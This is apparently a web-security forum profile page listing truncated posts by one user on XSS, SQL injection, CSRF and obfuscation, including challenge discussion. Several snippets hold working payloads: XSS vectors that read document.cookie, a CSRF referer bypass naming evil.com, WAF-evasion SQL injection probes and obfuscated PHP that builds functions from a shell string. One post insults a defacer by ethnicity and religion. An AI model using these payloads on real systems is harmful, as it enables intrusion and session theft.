Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 

Pages: 12345...LastNext
Current Page: 1 of 6
Results 1 - 30 of 164
4 months ago
barbarianbob
WOWIE!!!!!!!!!!!!!!!!!!!!
Forum: Projects
10 months ago
barbarianbob
*head flies back as I say "OH WOWW ! !"* Epic, bro, epic..
Forum: DoS
11 months ago
barbarianbob
1 year ago
barbarianbob
No I did not.
Forum: OMG Ponies
2 years ago
barbarianbob
Here's a fun little thing someone linked me to today: http://utf-8.jp/public/aaencode.html Input: alert("Hello, JavaScript") Output: ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o=(゚ー゚) =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー
Forum: Obfuscation
2 years ago
barbarianbob
<iframe src="//victim/vuln.php?injection=%3Cscript%3Elocation%3Dname%3B%3C%2Fscript%3E" name="javascript:alert(1)"></iframe>
Forum: XSS Info
2 years ago
barbarianbob
Hey Divine_Defender. It's me, Divine_Fire and I regret nothing!!
Forum: Intro
2 years ago
barbarianbob
<scrscriptipt>alert(1)</scrscriptipt>
Forum: XSS Info
2 years ago
barbarianbob
Not part of the new minification effort, but that bitwise stuff is really good for obfuscation. Ex: $create_function = '`pd`td_dtl`thll'|'cbaa`a_babc`acb'; $register_shutdown_function = 'pddhptdp_phttdltl_dtl`thll'|'bacac`ab_c`a``ccb_babc`acb'; $shell = 'var_dump(123);'; $register_shutdown_function($create_function('', $shell)); Here all the var names can be changed, but you can still
Forum: Obfuscation
3 years ago
barbarianbob
Yeah man. I'll help you find the download. First you have to
Forum: SQL and Code Injection
3 years ago
barbarianbob
It looks like they're treating blocks differently. var y=123; { function y(){} }; y; FF returns: function y() {} GC returns: 123 Edit: alert(z); { function z(){} }; alert(z); //FF errors //GC alerts "function z(){}" twice var z=123; alert(z); { function z(){} }; alert(z); //FF alerts "123", then "function z(){}" //GC alerts "123" twice
Forum: Obfuscation
3 years ago
barbarianbob
No. Defacing is dumb.
Forum: OMG Ponies
3 years ago
barbarianbob
If you switch the eval() to a var_dump(), the output will contain the key. You can also paste the code you have, and I'll try helping decode it.
Forum: Obfuscation
3 years ago
barbarianbob
Then use this:
Forum: SQL and Code Injection
3 years ago
barbarianbob
Your closing tag in the document.write is terminating the script tag early. Split it up into a concatenation: <script>document.write("<script src\u003d'//qr.net/4ds'></scr"+"ipt>")</script>
Forum: XSS Info
3 years ago
barbarianbob
I'm looking at lines 145,146 of csrf.py good_referer = 'https://%s/' % request.get_host() if not same_origin(referer, good_referer): And from the link I posted, the value for HTTP_X_FORWARDED_HOST overrides the real host. So instead of spoofing your referer to match the host, trick the host into thinking it's the referer: POST / HTTP/1.1 host: good.com referer: evil.com X_FORWARDED_HOST: e
Forum: CSRF and Session Info
3 years ago
barbarianbob
Can you send http_x_* headers with just js?
Forum: CSRF and Session Info
3 years ago
barbarianbob
I got them both using blind injection. Are they also supposed to be doable without using blind, as in outputting the password in the list? edit: I'm guessing "No" Anyway, it's a nice challenge. It gets you looking later on in the query than usual, since most challenges deal with the WHERE clause.
Forum: SQL and Code Injection
3 years ago
barbarianbob
I got it :D As already mentioned, it's a really nice challenge because it requires you to look from a different angle.
Forum: XSS Info
3 years ago
barbarianbob
Excellent work, the_master
Forum: OMG Ponies
3 years ago
barbarianbob
Try a bunch of half injections to see what it 403s with: www.site.com/?url=articles/category/union/ www.site.com/?url=articles/category/select/ www.site.com/?url=articles/category/union+select/ www.site.com/?url=articles/category/union+all+select/ www.site.com/?url=articles/category/union++++all++++select/ www.site.com/?url=articles/category/union+%23%0aselect/ etc.
Forum: SQL and Code Injection
3 years ago
barbarianbob
The 403 is probably happening from apache blocking characters in filenames. You can bypass that by using cakephp's alternate input format: www.site.com/?url=articles/category/6'blah I took a look at the current version of cakephp and it splits arguments by slashes (and all other characters are valid), so you can't do obfuscation with /* and */. But I also don't see any WAFs in the code, so you
Forum: SQL and Code Injection
3 years ago
barbarianbob
Do you have more than one place to add you input into the <script>, such as in the following? <script> var w = '<arg1>'; var x = '<arg2>'; </script> If so, you can try ?arg1=asdf\&arg2=;alert(1);\ The first one will slash the endquote, keeping the string going, until it hits the second string, where it will close right before your second input.
Forum: XSS Info
4 years ago
barbarianbob
Genius muslim algrian hacker, TopSaT13, downloads a script to deface a single page on a website. Considers this an achievement. Thinks defacement isn't retarded and actually means something. Kills you by having sex with your server and your web because you killed his brothers.
Forum: SQL and Code Injection
4 years ago
barbarianbob
It builds html that tries to social engineer people. It says to click a "Like" button and a "Share" button to see it. It's built from javascript to obfuscate it, which is probably to avoid automatic reports. It's nothing malicious.
Forum: Obfuscation
4 years ago
barbarianbob
Oh, so this is pretty much non ."' try alert(eval(atob(/ZG9jdW1lbnQuY29va2ll/(/ZG9jdW1lbnQuY29va2ll/)))) and obfuscate future code using this var code='alert(123)';alert('eval(atob(/'+btoa(code)+'/(/'+btoa(code)+'/)))');
Forum: XSS Info
4 years ago
barbarianbob
addslashes/magic_quotes is breaking it alert(eval(atob(/ZG9jdW1lbnQuY29va2ll/.source)))
Forum: XSS Info
4 years ago
barbarianbob
I don't think this one's possible because of the strpos() validation which restricts \, /, and : You can't pass an array to error the strpos (i.e. ?file[]=123) because then you won't be able to do readfile(). I was initially expecting passing a data wrapper to obfuscate the file name in base64 would work. But although the data wrapper looks lenient in its construction ('data:::/;base64,SSBsb3ZlI
Forum: SQL and Code Injection
4 years ago
barbarianbob
It's passing the array key hxxp://falcon.biucentrax.com/biucentrax/?idwp=499d3ef755e464.08815780
Forum: SQL and Code Injection
4 years ago
barbarianbob
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2225 This links to Stefan Esser's twitter: http://twitter.com/i0n1c/statuses/16447867829 And POC output: http://pastebin.com/mXGidCsd Does anyone have more info on this? Because holy shit he has been saying to never unserialize input since forever ago but a ton of people still do.
Forum: SQL and Code Injection
Pages: 12345...LastNext
Current Page: 1 of 6